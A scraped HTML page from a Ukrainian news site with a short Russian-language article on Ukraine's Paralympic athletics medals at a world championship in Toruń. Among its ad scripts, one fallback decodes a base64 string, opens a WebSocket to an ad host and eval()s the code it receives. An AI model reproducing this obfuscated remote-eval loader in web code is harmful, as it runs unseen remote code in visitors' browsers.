<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Национальная паралимпийская сборная команда Украины по легкой атлетике среди спортсменов с нарушениями умственного и физического развития стала первой на чемпионате мира, который только что завершился в польском городе Торун. Национальная паралимпийская сборная команда Украины по легкой атлетике">
<meta name="keywords" content="спортсменов, среди, нарушениями, медали, золотые, Украины, легкой, атлетике, чемпионате, умственного, физического, развития, паралимпийская, Национальная, завоевали, польском, национальной, Торун, городе, завершился">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике">
<meta property="og:url" content="http://www.citynews.net.ua/news/83102-ukrainskie-paralimpijcy-vernulis-rekordsmenami-s-chempionata-mira-po-legkoj-atletike.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-03/medium/1583148562_5e5cdc9b3a06a915736268_820x360.jpg">
<meta property="og:description" content="Национальная паралимпийская сборная команда Украины по легкой атлетике среди спортсменов с нарушениями умственного и физического развития стала первой на чемпионате мира, который только что завершился в польском городе Торун. Всего, как сообщает пресс-служба Национального комитета спорта инвалидов">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83102-ukrainskie-paralimpijcy-vernulis-rekordsmenami-s-chempionata-mira-po-legkoj-atletike.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике</h1>
<a href="http://www.citynews.net.ua/2020/03/02/" ><span class="date">Сегодня, 13:34</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,83102-ukrainskie-paralimpijcy-vernulis-rekordsmenami-s-chempionata-mira-po-legkoj-atletike.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/83102-ukrainskie-paralimpijcy-vernulis-rekordsmenami-s-chempionata-mira-po-legkoj-atletike.html" data-title="Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><a href="http://www.citynews.net.ua/uploads/posts/2020-03/1583148562_5e5cdc9b3a06a915736268_820x360.jpg" class="highslide" target="_blank"><img src="/uploads/posts/2020-03/medium/1583148562_5e5cdc9b3a06a915736268_820x360.jpg" alt="" style="display:block;margin-left:auto;margin-right:auto;"></a>Национальная паралимпийская сборная команда Украины по легкой атлетике среди спортсменов с нарушениями умственного и физического развития стала первой на чемпионате мира, который только что завершился в польском городе Торун.</p>
<p>Всего, как <!--dle_leech_begin--><a href="http://www.citynews.net.ua/index.php?do=go&amp;url=aHR0cHM6Ly9wYXJhbHltcGljLm9yZy51YS91YS9uZXdzL3VrcmF5aW5za2ktbGVna29hdGxldGktcG92ZXJudWxpcy1wZXJzaGltaS16LWNoZW1waW9uYXR1LXN2aXR1" target="_blank">сообщает</a><!--dle_leech_end--> пресс-служба Национального комитета спорта инвалидов Украины, украинские паралимпийцы завоевали 16 медалей, среди которых 10 золотых, 5 серебряных, 1 бронзовая.</p>
<p>Все спортсмены национальной сборной привезли в Украину высокие награды: 7 спортсменов из 10 завоевали золотые медали, из них 5 - мультимедалистов</p>
<p>Это уникально высокий результат национальной команды на чемпионате мира по легкой атлетике среди спортсменов с нарушениями умственного и физического развития в помещении.</p>
<p>Наибольшее количество наград завоевали Людмила Данилина  - 4 золотые и 1 серебряная медали и Юлия Шуляр - 4 золотые медали.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/sport/62087-ukrainskie-paralimpiycy-na-pervom-meste-zavershili-sezon-zimnego-kubka-mira.html">Украинские паралимпийцы на первом месте завершили сезон зимнего Кубка мира</a></li><li><a href="http://www.citynews.net.ua/news/32176-luganchanka-natalya-kobylyackaya-zavoevala-serebryanuyu-i-bronzovuyu-medali-na-chempionate-mira-po-legkoy-atletike-v-zakrytyh-pomescheniyah-sredi-sportsmenov-s-narusheniyami-ufr.html">Луганчанка Наталья Кобыляцкая завоевала серебряную и бронзовую медали на чемпионате мира по лёгкой атлетике в закрытых помещениях среди спортсменов с нарушениями УФР</a></li><li><a href="http://www.citynews.net.ua/news/26632-luganskaya-sportsmenka-zavoevala-3-medali-na-chempionate-mira-v-chehii-po-legkoy-atletike.html">Луганская спортсменка завоевала 3 медали на чемпионате мира в Чехии по легкой атлетике</a></li><li><a href="http://www.citynews.net.ua/news/25953-luganchane-na-chempionate-ukrainy-po-legkoatleticheskim-metaniyam-zavoevali-27-medaley-i-ustanovili-3-rekorda.html">Луганчане на Чемпионате Украины по легкой атлетике завоевали 27 медалей и установили 3 рекорда</a></li><li><a href="http://www.citynews.net.ua/news/15101-sportsmeny-s-narusheniem-intellekta-iz-luganska-zavoevali-zolotuyu-medal.html">Спортсмены с нарушением интеллекта из Луганска завоевали золотую медаль</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Сегодня, 17:57</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83107-stanichno-luganskie-lesniki-planirujut-vysadit-250-ga-nasazhdenij.html">Станично-Луганские лесники планируют высадить 250 га насаждений</a></h4><span>Сегодня, 15:35</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83106-doneckie-terroristy-zajavili-chto-obmena-plennymi-v-marte-ne-budet.html">Донецкие террористы заявили что обмена пленными в марте не будет</a></h4><span>Сегодня, 14:11</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83104-shahteram-poobeschali-654-mln-grn-na-pogashenie-dolgov-po-zarplate.html">Шахтерам пообещали 654 млн грн на погашение долгов по зарплате</a></h4><span>Сегодня, 14:06</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83103-v-luganskoj-oblasti-ubijcu-s-passatizhami-prigovorili-k-15-godam-tjurmy.html">В Луганской области убийцу с пассатижами приговорили к 15 годам тюрьмы</a></h4><span>Сегодня, 13:34</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83102-ukrainskie-paralimpijcy-vernulis-rekordsmenami-s-chempionata-mira-po-legkoj-atletike.html">Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике</a></h4><span>Сегодня, 13:24</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83101-v-doneckoj-oblasti-rossijskie-terroristy-obstreljali-iz-minometov-zhilye-doma-1-chelovek-ranen.html">В Донецкой области российские террористы обстреляли из минометов жилые дома - 1 человек ранен</a></h4><span>Сегодня, 12:45</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83100-v-popasnoj-na-kolodij-proveli-festival-varenikov-foto.html">В Попасной на Колодий провели фестиваль вареников - фото</a></h4><span>Сегодня, 10:23</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83099-v-luganskoj-oblasti-nachali-remont-dorog-mezhdu-svatovo-i-starobelskom.html">В Луганской области начали ремонт дорог между Сватово и Старобельском</a></h4><span>Сегодня, 10:12</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83098-oficialno-ermak-obsudil-s-kozakom-obmen-ukrainskih-zalozhnikov-na-rossijskih-terroristov.html">Официально: Ермак обсудил с Козаком обмен украинских заложников на российских террористов</a></h4><span>Вчера, 18:40</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83097-rossijskie-terroristy-podbili-iz-ptrk-avtomobil-v-luganskoj-oblasti-1-soldat-pogib-4-raneno.html">Российские террористы подбили из ПТРК автомобиль в Луганской области: 1 солдат погиб, 4 ранено</a></h4><span>Вчера, 11:14</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83096-rossijskie-terroristy-obstreljali-stanicu-luganskuju-i-kpvv-marinka.html">Российские террористы обстреляли Станицу Луганскую и КПВВ Марьинка</a></h4><span>29-02-2020, 16:34</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83095-sergej-zhadan-i-detskie-pisateli-edut-v-shkoly-i-biblioteki-luganskoj-oblasti.html">Сергей Жадан и детские писатели едут в школы и библиотеки Луганской области</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Сегодня, 15:24</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83105-kievskaja-policija-razgromila-set-narkolaboratorij-s-tovarom-na-100-mln-griven.html">Киевская полиция разгромила сеть нарколабораторий с товаром на 100 млн гривень</a></h4><span>26-02-2020, 14:28</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83062-pod-ofisom-zelenskogo-protestujuschij-sovershil-samosozhzhenie-v-znak-protesta.html">Под офисом Зеленского мужчина совершил самосожжение в знак протеста</a></h4><span>25-02-2020, 12:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83055-v-odesse-iz-za-silnogo-vetra-bez-sveta-224-naselennyh-punkta-povrezhdeno-bolee-100-avtomobilej.html">В Одессе из-за сильного ветра без света 224 населенных пункта, повреждено более 100 автомобилей</a></h4><span>24-02-2020, 16:09</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83053-v-odesse-derevo-ubilo-zhenschinu.html">В Одессе дерево убило женщину</a></h4><span>24-02-2020, 13:02</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83048-pod-kievom-pjanyj-otec-izbil-7-mesjachnuju-doch-do-sotrjasenija-mozga.html">Под Киевом пьяный отец избил 7-месячную дочь до сотрясения мозга</a></h4><span>20-02-2020, 13:34</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83021-v-odesse-bolee-300-chelovek-obespechili-lecheniem-gepatita-s-za-schet-bjudzheta-goroda.html">В Одессе более 300 человек обеспечили лечением гепатита С за счет бюджета города</a></h4><span>19-02-2020, 15:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83016-v-kieve-zapretjat-dvizhenie-gruzovyh-avtomobilej-po-mostu-patona.html">В Киеве запретят движение грузовых автомобилей по мосту Патона</a></h4><span>19-02-2020, 11:19</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83011-avtobus-odessa-kiev-stolknulsja-s-gruzovikom-18-chelovek-postradali.html">Автобус «Одесса-Киев» столкнулся с грузовиком - 18 человек пострадали</a></h4><span>17-02-2020, 08:19</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/82988-pod-kievom-pjanyj-policejskij-sbil-ljudej-na-peshehodnom-perehode-1-chelovek-pogib.html">Под Киевом пьяный полицейский сбил людей на пешеходном переходе - 1 человек погиб</a></h4><span>14-02-2020, 16:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/82983-poshagovyj-detejling-instrukcija-dlja-novichkov.html">Пошаговый детейлинг: инструкция для новичков</a></h4><span>13-02-2020, 14:52</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/82975-v-harkovskoj-oblasti-ubijce-kota-predjavili-obvinenie-prestupnice-grozit-ot-5-do-8-let-lishenija-svobody.html">В Харьковской  области убийце кота предъявили обвинение - преступнице грозит от 5 до 8 лет лишения свободы</a></h4><span>13-02-2020, 13:58</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/82974-v-odesse-projdet-otkrytyj-dzhazovyj-festival-konkurs-blackampwhite-music.html">В Одессе пройдет открытый джазовый фестиваль-конкурс «Black&amp;White Music»</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('02','2020','right'); return false;" href="http://www.citynews.net.ua/2020/02/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Март 2020&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="6">&nbsp;</td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/03/01/" title="Все публикации за 01 марта 2020">1</a></td></tr><tr><td  class="day-active-v day-current" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/03/02/" title="Все публикации за 02 марта 2020">2</a></td><td  class="day" >3</td><td  class="day" >4</td><td  class="day" >5</td><td  class="day" >6</td><td  class="weekday" >7</td><td  class="weekday" >8</td></tr><tr><td  class="day" >9</td><td  class="day" >10</td><td  class="day" >11</td><td  class="day" >12</td><td  class="day" >13</td><td  class="weekday" >14</td><td  class="weekday" >15</td></tr><tr><td  class="day" >16</td><td  class="day" >17</td><td  class="day" >18</td><td  class="day" >19</td><td  class="day" >20</td><td  class="weekday" >21</td><td  class="weekday" >22</td></tr><tr><td  class="day" >23</td><td  class="day" >24</td><td  class="day" >25</td><td  class="day" >26</td><td  class="day" >27</td><td  class="weekday" >28</td><td  class="weekday" >29</td></tr><tr><td  class="day" >30</td><td  class="day" >31</td><td colspan="5">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Национальная паралимпийская сборная команда Украины по легкой атлетике среди спортсменов с нарушениями умственного и физического развития стала первой на чемпионате мира, который только что завершился в польском городе Торун. Национальная паралимпийская сборная команда Украины по легкой атлетике">
<meta name="keywords" content="спортсменов, среди, нарушениями, медали, золотые, Украины, легкой, атлетике, чемпионате, умственного, физического, развития, паралимпийская, Национальная, завоевали, польском, национальной, Торун, городе, завершился">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Украинские паралимпийцы вернулись рекордсменами с чемпионата мира по легкой атлетике">
<meta property="og:url" content="http://www.citynews.net.ua/news/83102-ukrainskie-paralimpijcy-vernulis-rekordsmenami-s-chempionata-mira-po-legkoj-atletike.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-03/medium/1583148562_5e5cdc9b3a06a915736268_820x360.jpg">
<meta property="og:description" content="Национальная паралимпийская сборная команда Украины по легкой атлетике среди спортсменов с нарушениями умственного и физического развития стала первой на чемпионате мира, который только что завершился в польском городе Торун. Всего, как сообщает пресс-служба Национального комитета спорта инвалидов">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83102-ukrainskie-paralimpijcy-vernulis-rekordsmenami-s-chempionata-mira-po-legkoj-atletike.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
